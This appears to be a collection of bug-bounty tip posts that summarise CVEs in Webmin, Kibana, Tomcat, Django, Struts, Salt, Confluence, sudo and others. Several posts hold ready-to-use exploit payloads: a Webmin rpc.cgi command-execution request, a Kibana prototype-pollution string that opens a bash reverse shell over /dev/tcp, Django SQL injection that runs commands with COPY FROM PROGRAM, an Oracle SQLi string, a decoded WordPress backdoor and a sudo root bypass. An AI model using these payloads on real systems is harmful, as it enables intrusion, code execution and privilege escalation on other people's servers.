CVE-2020-5902 allows for unauthenticated attackers execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.
👇just an example
CVE-2019-15642 another Webmin Remote Code Execution (authenticated)
1. set User-Agent as webmin
2. set Authorization
3. set payload:
OBJECT CGI;print "Content-Type: chybeta\n\n";$cmd=`id`;print "$cmd";
4. post to /rpc.cgi
CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
#BugBountyTips
#BugBounty
#bugbountytip
Apache Tomcat AJP Vulnerability (CNVD-2020-10487/CVE-2020-1938 ) .This vulnerability was discovered by a security researcher of Chaitin Tech .
You can read any webapps files or include a file to RCE .JUST A POC-GIF with no DETAILS
Tomcat has fix this vulnerability ,UPDATE!
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that uses the `toBSON` method
however there are lots of no-auth mongo-express ...
shodan:
poc:
EXP for CVE-2019-14234 Django JSONField SQL Injection
Step1:
?data__breed'%3f'a') OR 1%3d2 %3bCREATE table cmd_exec(cmd_output text) -- OR ....
Step2:
?data__breed'%3f'a') OR 1%3d2 %3bCOPY cmd_exec FROM PROGRAM 'ping ' -- OR ...
Apache Struts RCE: S2-059 / CVE-2019-0230
Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
backdoor in fake super socialat plugin(/wp-content/plugins/super-socialat/super_socialat.php)
base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") =>
system("whoami");
POC:
http://localhost:8000/test/?q=20)
= 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v%24instance)) from dual) is null%20 OR (1%2B1
analysis:
The version used by Hacking Team and this bank had the vulnerable bash version, but the cgi requests did not trigger the shellshock- except for the requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh.
nnnnday - -
CVE-2019-18622 SQLI in phpMyAdmin: A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.
Exploiting ASP .NET TemplateParser to get RCE in Sitecore (CVE-2023-35813) and SharePoint (CVE-2023-33160) by
@mwulftange
in two parts: part 1 at is live now and part 2 will follow in a few days...stay tuned!
CVE-2020-5405: Directory Traversal with spring-cloud-config-server. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
Advisory:
CVE-2020-7471: SQLI in Django:
django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter.
FIX:
Hey look, I've just found a seRioUs vulnerability in Java System.out.println() method
Just by executing System.out.println() with a malicious Object with the method toString() is override, our mAlicIous code will get executed remotely ( ͡° ͜ʖ ͡°)
CVE-2023-22518 - Improper Authorization Vulnerability In Confluence Data Center and Server
Don’t use and never use this vulnerability lightly,because it is a master of data cleaning
CVE-2020-25592 Any value for "eauth"/"token” allow a user to bypass auth and make calls to Salt SSH.
CVE-2020-16846 A user could use shell injections with the Salt API using the SSH Client.
25592+16846=Unauth RCE
分析
CVE-2019-14287 sudo -u#-1 xxxx
This can be used by a user with sufficient sudo privileges to run
commands as root even if the Runas specification explicitly disallows
root access as long as the ALL keyword is listed first in
the Runas specification.